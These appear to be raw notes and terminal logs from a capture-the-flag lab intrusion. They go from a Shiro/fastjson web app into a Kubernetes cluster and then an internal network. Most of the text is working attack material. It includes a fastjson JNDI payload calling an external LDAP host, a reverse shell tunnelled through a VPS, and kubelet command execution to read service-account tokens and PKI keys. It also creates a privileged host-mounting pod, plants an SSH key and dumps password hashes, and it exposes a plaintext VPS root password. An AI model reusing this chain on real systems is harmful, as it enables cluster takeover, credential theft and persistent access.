Rivulet
1. flag01
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# fscan -h 8.160.186.13
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[894ms] 已选择服务扫描模式
[894ms] 开始信息扫描
[894ms] 最终有效主机数量: 1
[894ms] 开始主机扫描
[894ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[894ms] 有效端口数量: 233
[951ms] [*] 端口开放 8.160.186.13:22
[968ms] [*] 端口开放 8.160.186.13:2379
[994ms] [*] 端口开放 8.160.186.13:8080
[996ms] [*] 端口开放 8.160.186.13:10250
[3.7s] 扫描完成, 发现 4 个开放端口
[3.7s] 存活端口数量: 4
[3.7s] 开始漏洞扫描
[3.7s] POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 https://8.160.186.13:10250 状态码:200 长度:104 标题:无标题
[4.1s] [*] 网站标题 http://8.160.186.13:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10
[4.3s] [*] 网站标题 http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10 状态码:400 长度:277 标题:无标题
[4.6s] [*] 网站标题 http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10 状态码:400 长度:277 标题:无标题
[44.3s] 扫描已完成: 7/7
1.1. shiro 8080
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# telnet 8.160.186.13 2379
Trying 8.160.186.13...
Connected to 8.160.186.13.
Escape character is '^]'.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet] └─# sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no -R 0.0.0.0:443:127.0.0.1:4444 root@43.159.45.90 -N ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet] └─# penelope -p 4444 [+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 • 192.168.8.18 • 192.168.88.3 • 172.17.0.1 • 172.19.0.1 ➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C) [+] [New Reverse Shell] => 52a205b59ba8 127.0.0.1 Linux-x86_64 👤 root(0) 😍️ Session ID <1> [+] Upgrading shell to PTY... [+] PTY upgrade successful via /usr/bin/python [+] Interacting with session [1] • PTY • Menu key F12 ⇐ [+] Session log: /root/.penelope/sessions/52a205b59ba8~127.0.0.1-Linux-x86_64/2026_04_24-09_02_34-685.log ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── root@52a205b59ba8:/app# ls app.jar
k8s 晚上去访问
root@52a205b59ba8:/app# curl -sk 'https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy' -d 'cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token'
eyJhbGciOiJSUzI1NiIsImtpZCI6InhGbFBSYmlsZlNVb3pGa0JvSThpQ0JnaHgwMTU5dm9zRzMybktUTElyTmsifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJrdWJlLXByb3h5LXRva2VuLWtidzRyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6Imt1YmUtcHJveHkiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIzMmM1MmMwOS1kOGFlLTRjNDctYjBlMS1lMThhZmM2NzVmNDIiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06a3ViZS1wcm94eSJ9.XToOVdoFEQo3Jng3ok2lCfJUdykddleXVDcBjCYr3yeB6CNJcluXYc3joZl7Z5hCepPP3Hhw2quacDWjhd-TJKwJrzBs30lDVvNP1P38_egmy1YEHIE3qjFdA7pa8Qy8ttU6il1jLtH9YONP8FMcip8CMuejeB7doMYTaCaHPv3HM7ch3mO-_EX3MwIl8u2g5FUYPNls72EHiZPgtXlYQnYEmvRX1Le4rJXrJ_17va21VKvD_QJnQ6nDbZuJhiIqnLCmyjb7_olyA2p0FnZDKx6coEwo3iKDZgMCvmC80XGHZu_OuwNoYaLemZJ4tTit96M-T_19TE_79sMJGwneYA
# ========== 1. VPS 端:杀掉残留 sshd 释放 443 ==========
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 'kill -9 1234008; sleep 1; ss -tlnp | grep -E ":443|:1389|:1099"'
# ========== 2. kali 端:清理僵尸 ssh -R 客户端 ==========
pkill -9 -f "ssh.*-R.*443:127.0.0.1:4444"; sleep 1; pgrep -af "ssh.*-R.*443" || echo "all clean"
# ========== 3. kali 端:重建后台 -R 隧道 (443 -> 本地 4444) ==========
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -fN -R 0.0.0.0:443:127.0.0.1:4444 root@43.159.45.90
# ========== 4. 验证 VPS 端 443 重新监听 ==========
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 'ss -tlnp | grep ":443"'
# ========== 5. 启动 penelope (如果还没起) ==========
penelope -p 4444
# ========== 6. 触发 fastjson + JNDI payload (新开终端) ==========
python3 -c "
import requests
BASE='http://8.160.189.60:8080'
s=requests.Session()
s.post(f'{BASE}/doLogin', data={'username':'admin','password':'123456'}, allow_redirects=False)
url='ldap://43.159.45.90:1389/v1qqxf'
p='{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"'+url+'\",\"autoCommit\":true}}'
import time; t0=time.time()
r=s.post(f'{BASE}/create', data=p, headers={'Content-Type':'application/json'}, allow_redirects=False, timeout=30)
print(f'HTTP {r.status_code} ({time.time()-t0:.1f}s)')
"
# ========== 如果还没收到 shell,诊断命令 ==========
# 查 jndi_tool 日志(看 LDAP 请求是否到达)
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 'tail -50 /tmp/jndi_tool.log'
# 查从受害机来的活动连接
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 'ss -tn | grep 8.160.189.60'
在 etcd-web 容器内用 etcdctl 直接 dump etcd,拿 cluster-admin SA token → 用 admin token 创建特权 pod → 挂宿主机 /
- 宿主机 kubelet `10250` **未授权**(允许 `/run/<ns>/<pod>/<container>` 执行命令)
- 容器和宿主机同网段:`172.17.0.1` 是宿主机 docker 网关 = kubelet 监听 IP
- API Server 在 `192.168.1.56:6443`
# 探测 kubelet 10250 未授权
curl -sk https://172.17.0.1:10250/pods | head
# 确认可在任意容器执行命令(测 kube-proxy 容器)
curl -sk https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy -d 'cmd=id'
# uid=0(root) gid=0(root) groups=0(root)
Pod 命名规则:`/run/<namespace>/<pod-name>/<container-name>`,可从 `/pods` 响应的 JSON 中获取。
# kube-proxy 容器(privileged+hostNetwork,但 SA 无 pod 创建权限)
K=https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy
# etcd 容器(有 etcdctl,挂载了 etcd 证书)
E=https://172.17.0.1:10250/run/kube-system/etcd-web/etcd
# kube-apiserver 容器(挂载 /etc/kubernetes/pki 全量证书)⭐关键
A=https://172.17.0.1:10250/run/kube-system/kube-apiserver-web/kube-apiserver
mkdir -p /tmp/pki && cd /tmp/pki
# 确认证书存在
curl -sk $A --data-urlencode "cmd=ls /etc/kubernetes/pki/"
# 下载 system:masters 证书三件套
curl -sk $A --data-urlencode "cmd=cat /etc/kubernetes/pki/apiserver-kubelet-client.crt" > akc.crt
curl -sk $A --data-urlencode "cmd=cat /etc/kubernetes/pki/apiserver-kubelet-client.key" > akc.key
curl -sk $A --data-urlencode "cmd=cat /etc/kubernetes/pki/ca.crt" > ca.crt
> 注意:必须用 `--data-urlencode`,否则 `/` 等特殊字符会被 curl 默认 `-d` 吃掉换行。
# 应返回 PodList JSON(而非 Forbidden)
curl -s --cert akc.crt --key akc.key --cacert ca.crt \
https://192.168.1.56:6443/api/v1/namespaces/default/pods?limit=1 | head -5
cat > /tmp/esc.json << 'JSON'
{
"apiVersion": "v1",
"kind": "Pod",
"metadata": {"name": "sys-mon", "namespace": "default"},
"spec": {
"nodeName": "web",
"hostNetwork": true,
"hostPID": true,
"hostIPC": true,
"containers": [{
"name": "c",
"image": "registry.aliyuncs.com/google_containers/kube-proxy:v1.16.5",
"command": ["sleep", "86400"],
"securityContext": {"privileged": true},
"volumeMounts": [{"name": "host", "mountPath": "/host"}]
}],
"volumes": [{"name": "host", "hostPath": {"path": "/"}}],
"tolerations": [{"operator": "Exists"}]
}
}
JSON
curl -s --cert akc.crt --key akc.key --cacert ca.crt \
-H "Content-Type: application/json" -X POST \
-d @/tmp/esc.json \
https://192.168.1.56:6443/api/v1/namespaces/default/pods
P=https://172.17.0.1:10250/run/default/sys-mon/c
# 等 Pod Running
sleep 10
curl -sk $P --data-urlencode "cmd=id"
# 读宿主机任意文件
curl -sk $P --data-urlencode "cmd=ls /host/"
curl -sk $P --data-urlencode "cmd=cat /host/flag1"
# flag1{1fbfaaf6-4810-4239-b8df-b182b3ea11d2}
curl -sk $P --data-urlencode "cmd=cat /host/Notes"
# 泄露密码: 2835c8c60e654e7a1a8bd2e51059d9b3
# 写宿主机 root 的 authorized_keys
curl -sk $P --data-urlencode "cmd=sh -c 'mkdir -p /host/root/.ssh && echo YOUR_PUBKEY >> /host/root/.ssh/authorized_keys'"
# 或 chroot 进宿主机(因为 /host 就是 rootfs)
curl -sk $P --data-urlencode "cmd=chroot /host /bin/bash -c 'whoami; hostname'"
root@web:/# cat flag1
flag1{1fbfaaf6-4810-4239-b8df-b182b3ea11d2}
2. flag2
root@web:/# cat /Notes
3.21
Network interface failed to initialize on boot;
- manual reconfiguration applied.
3.18
Docker daemon instability observed;
- service restart restored functionality.
3.16
Kubernetes CNI plugin failure detected;
- pod network connectivity partially degraded.
3.12
Authentication log review completed, no abnormal SSH access confirmed.
3.08
Filesystem mount inconsistency detected;
- remounted affected volume.
3.05
Kernel update applied, temporary network driver mismatch observed post-reboot.
2.28
Firewall rule set revised, unexpected traffic filtering behavior corrected.
2.20
Container runtime performance degradation investigated, memory pressure resolved.
2.10
Scheduled backup verification completed, incremental backup chain validated.
2.2
The default password strength is relatively weak;
- Change the password to a strong one: 2835c8c60e654e7a1a8bd2e51059d9b3
1.25
System-wide package upgrade completed, minor dependency conflicts resolved.
1.10
Initial network configuration audit performed, baseline established.
这个哈西就是 web-123456
root@web:/# ./fscan -h 192.168.1.56/24 -nobr
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.1.56 is alive
(icmp) Target 192.168.1.123 is alive
(icmp) Target 192.168.1.253 is alive
[*] Icmp alive hosts len is: 3
192.168.1.56:10250 open
192.168.1.56:2379 open
192.168.1.123:22 open
192.168.1.56:22 open
192.168.1.123:8000 open
192.168.1.56:8080 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://192.168.1.123:8000 code:404 len:22 title:None
[*] WebTitle http://192.168.1.56:8080 code:302 len:0 title:None 跳转url: http://192.168.1.56:8080/login;jsessionid=7C97510616F4793173896536D25A241F
[*] WebTitle https://192.168.1.56:10250 code:404 len:19 title:None
[*] WebTitle http://192.168.1.56:8080/login;jsessionid=7C97510616F4793173896536D25A241F code:400 len:277 title:None
已完成 6/6
[*] 扫描结束,耗时: 6.991040759s
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# proxychains -q curl http://192.168.1.123:8000/docs
{"0":{"api":"User Information Query","method":"POST","url":"/api/BasicData","content-type":"application/json","params":{"username":"fuzzy search","workingID":"exact match"},"example":{"request":{"username":"al"},"response":{"status":"success","count":1,"data":[{"username":"alex","phone":"170*****723","email":"zmf7yv90y@company.com","workingID":"503207b4-0e73-41bd-ae30-cd921b6d7f28"}]}}},"1":{"api":"Project Record Query","method":"POST","url":"/api/ProjectRecord","content-type":"application/json","params":{"username":"exact search","grade":"exact match"},"example":{"request":{"grade":"A"},"response":{"status":"success","count":1,"data":[{"employee_name":"jaxon","task":"Brand Refresh","start_date":"2025-11-02","end_date":"2025-04-09","status":"A"}]}}},"2":{"api":"Attendance Record Query","method":"POST","url":"/api/AttendanceRecord","content-type":"application/json","params":{"username":"fuzzy search"},"example":{"request":{"username":"Alice"},"response":{"status":"success","count":1,"data":[{"employee_name":"Alice Johnson","status":"Late","remarks":"Arrived late due to traffic congestion","check_in_time":"2025-01-02 09:10","check_out_time":"2025-01-02 17:45"}]}}},"3":{"api":"Search for Password Hash (Limit 10)","method":"POST","url":"/api/PasswdHash","content-type":"application/json","params":{"username":"fuzzy search"},"example":{"request":{"username":"alex"},"response":{"status":"success","count":1,"data":[{"username":"alex","hash":"c5804b3885b4d5ca57a254a1e06ef72a"}]}}}}
┌──(root㉿kali)-[~/.ssh]
└─# proxychains -q curl -X POST http://192.168.1.123:8000/api/PasswdHash \
> -H 'Content-Type: application/json' -d '{"username":""}'
{"status":"success","count":10,"data":[{"username":"alex","hash":"c5804b3885b4d5ca57a254a1e06ef72a"},{"username":"emma","hash":"f565abb10ff45ef1702c9b1df20ba95e"},{"username":"liam","hash":"1a9f6ffe008cdf8f7e75c1364ad99750"},{"username":"olivia","hash":"5f9585c00f061121f22087ee2bf6ac19"},{"username":"noah","hash":"95c62f9db238479a4746d3fb34ff7ec0"},{"username":"ava","hash":"f4ff96f1a430cd823d2f79a247c1c312"},{"username":"william","hash":"c3e17add574352b67d72b44ab11f42b4"},{"username":"isabella","hash":"c47b85c42650dedfe12f87715829b51a"},{"username":"james","hash":"af8ea5dfcdb3584bf9cec79668a1a089"},{"username":"sophia","hash":"dddd03d20234d69a95f358089562d5a6"}]}
root@web:/# kubectl get nodes -o wide; kubectl get pods -A -o wide; kubectl get svc -A; ip r; docker ps -a
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
web NotReady master 8d v1.16.6-beta.0 192.168.1.56 <none> Ubuntu 18.04.6 LTS 4.15.0-213-generic docker://18.3.1
NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
default sys-mon 1/1 Running 0 43m 192.168.1.56 web <none> <none>
kube-flannel kube-flannel-ds-7tjnc 1/1 Running 10 8d 192.168.1.56 web <none> <none>
kube-system coredns-58cc8c89f4-msffg 0/1 Pending 0 8d <none> <none> <none> <none>
kube-system coredns-58cc8c89f4-wsbgw 0/1 Pending 0 8d <none> <none> <none> <none>
kube-system etcd-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-apiserver-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-controller-manager-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-proxy-j874v 1/1 Running 5 8d 192.168.1.56 web <none> <none>
kube-system kube-scheduler-web 1/1 Running 10 8d 192.168.1.56 web <none> <none>
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 8d
kube-system kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 8d
default via 192.168.1.253 dev ens5 proto static metric 10
default via 192.168.64.253 dev ens7 proto static metric 20
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.1.0/24 dev ens5 proto kernel scope link src 192.168.1.56
192.168.64.0/24 dev ens7 proto kernel scope link src 192.168.64.14
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5ddcece6b65f 0ee1b8a3ebe0 "sleep 86400" 43 minutes ago Up 43 minutes k8s_c_sys-mon_default_16bc6aa2-9cb2-49c7-830a-d7f66ff7a684_0
e4f96ff18684 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 43 minutes ago Up 43 minutes k8s_POD_sys-mon_default_16bc6aa2-9cb2-49c7-830a-d7f66ff7a684_0
6e39228c20e1 ff281650a721 "/opt/bin/flanneld -…" 2 hours ago Up 2 hours k8s_kube-flannel_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_10
607ea51641cd ff281650a721 "/opt/bin/flanneld -…" 2 hours ago Exited (1) 2 hours ago k8s_kube-flannel_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_9
870ee0209ee9 0ee1b8a3ebe0 "/usr/local/bin/kube…" 2 hours ago Up 2 hours k8s_kube-proxy_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_5
6a4958f153ce registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_5
d51ef9059c32 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_5
a3ecd6d9cc92 441835dd2301 "kube-controller-man…" 2 hours ago Up 2 hours k8s_kube-controller-manager_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_9
8fc970a4a507 b4d073a9efda "kube-scheduler --au…" 2 hours ago Up 2 hours k8s_kube-scheduler_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_10
d2fdfc8d6bde b2756210eeab "etcd --advertise-cl…" 2 hours ago Up 2 hours k8s_etcd_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_9
7dd75c768507 fc838b21afbb "kube-apiserver --ad…" 2 hours ago Up 2 hours k8s_kube-apiserver_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_9
b5be4a8abf14 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_8
a8d83b96e20d registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_9
49429132157c registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_6
646cb1ca38c9 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_6
c326f93b4139 0ee1b8a3ebe0 "/usr/local/bin/kube…" 6 days ago Exited (255) Less than a second ago k8s_kube-proxy_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_4
f416c6b49407 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_4
bd6a3baebedc b2756210eeab "etcd --advertise-cl…" 6 days ago Exited (255) Less than a second ago k8s_etcd_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_8
91466a17b688 fc838b21afbb "kube-apiserver --ad…" 6 days ago Exited (255) Less than a second ago k8s_kube-apiserver_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_8
69cd8f48ef27 b4d073a9efda "kube-scheduler --au…" 6 days ago Exited (255) Less than a second ago k8s_kube-scheduler_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_9
4eee9f10e7ec 441835dd2301 "kube-controller-man…" 6 days ago Exited (255) Less than a second ago k8s_kube-controller-manager_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_8
8b993cee95cc registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_5
9b055547026e registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_5
171b5918d0d2 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_8
5e777a39bb80 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_7
52a205b59ba8 shiro-web "java -jar /app/app.…" 2 weeks ago Up Less than a second 0.0.0.0:8080->8080/tcp shiro-web
root@web:/tmp# /fscan -h 192.168.64.0/16 -nobr
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.1.56 is alive
(icmp) Target 192.168.1.253 is alive
(icmp) Target 192.168.1.123 is alive
(icmp) Target 192.168.64.14 is alive
(icmp) Target 192.168.64.253 is alive
[*] LiveTop 192.168.0.0/16 段存活数量为: 5
[*] LiveTop 192.168.1.0/24 段存活数量为: 3
[*] Icmp alive hosts len is: 5
[*] LiveTop 192.168.64.0/24 段存活数量为: 2
192.168.64.14:22 open
192.168.1.56:22 open
192.168.1.123:8000 open
192.168.1.123:22 open
192.168.1.56:8080 open
192.168.64.14:8080 open
192.168.1.56:2379 open
192.168.64.14:10250 open
192.168.1.56:10250 open
[*] alive ports len is: 9
start vulscan
[*] WebTitle http://192.168.1.123:8000 code:404 len:22 title:None
[*] WebTitle http://192.168.1.56:8080 code:302 len:0 title:None 跳转url: http://192.168.1.56:8080/login;jsessionid=C8DF92C25CDD4170CE3172D8C4E5D507
[*] WebTitle http://192.168.64.14:8080 code:302 len:0 title:None 跳转url: http://192.168.64.14:8080/login;jsessionid=A0BFDE255B4F6C35C7FC04FFF9E0BFD2
[*] WebTitle https://192.168.64.14:10250 code:200 len:104 title:None
[*] WebTitle https://192.168.1.56:10250 code:404 len:19 title:None
[*] WebTitle http://192.168.64.14:8080/login;jsessionid=A0BFDE255B4F6C35C7FC04FFF9E0BFD2 code:400 len:277 title:None
[*] WebTitle http://192.168.1.56:8080/login;jsessionid=C8DF92C25CDD4170CE3172D8C4E5D507 code:400 len:277 title:None
已完成 9/9
[*] 扫描结束,耗时: 10.885932953s
root@web:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:f3ff:fee6:841a prefixlen 64 scopeid 0x20<link>
ether 02:42:f3:e6:84:1a txqueuelen 0 (Ethernet)
RX packets 4255 bytes 434651 (434.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6894 bytes 7701667 (7.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.56 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::216:3eff:fe11:738b prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:11:73:8b txqueuelen 1000 (Ethernet)
RX packets 149688 bytes 45796242 (45.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 292846 bytes 38772221 (38.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.64.14 netmask 255.255.255.0 broadcast 192.168.64.255
inet6 fe80::216:3eff:fe11:736f prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:11:73:6f txqueuelen 1000 (Ethernet)
RX packets 2919 bytes 122694 (122.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37297 bytes 2665034 (2.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
flannel.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.244.0.0 netmask 255.255.255.255 broadcast 0.0.0.0
inet6 fe80::f83b:51ff:fe5e:e69d prefixlen 64 scopeid 0x20<link>
ether fa:3b:51:5e:e6:9d txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 16 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 616363 bytes 128801756 (128.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 616363 bytes 128801756 (128.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth867a333: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::145f:d6ff:fee8:dbd5 prefixlen 64 scopeid 0x20<link>
ether 16:5f:d6:e8:db:d5 txqueuelen 0 (Ethernet)
RX packets 4255 bytes 494221 (494.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6910 bytes 7702883 (7.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
'
root@web:/var/www/html# netstat -lnpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:10259 0.0.0.0:* LISTEN 2850/kube-scheduler
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 825/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1001/sshd
tcp 0 0 127.0.0.1:10248 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:10249 0.0.0.0:* LISTEN 3195/kube-proxy
tcp 0 0 0.0.0.0:10250 0.0.0.0:* LISTEN 1122/nginx: master
tcp 0 0 192.168.1.56:6443 0.0.0.0:* LISTEN 2806/kube-apiserver
tcp 0 0 192.168.1.56:2379 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:2379 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 192.168.1.56:2380 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:2381 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:10255 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:46575 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:10256 0.0.0.0:* LISTEN 3195/kube-proxy
tcp 0 0 127.0.0.1:10257 0.0.0.0:* LISTEN 2903/kube-controlle
tcp6 0 0 :::22 :::* LISTEN 1001/sshd
tcp6 0 0 :::10251 :::* LISTEN 2850/kube-scheduler
tcp6 0 0 :::10252 :::* LISTEN 2903/kube-controlle
tcp6 0 0 :::8080 :::* LISTEN 1676/docker-proxy
'


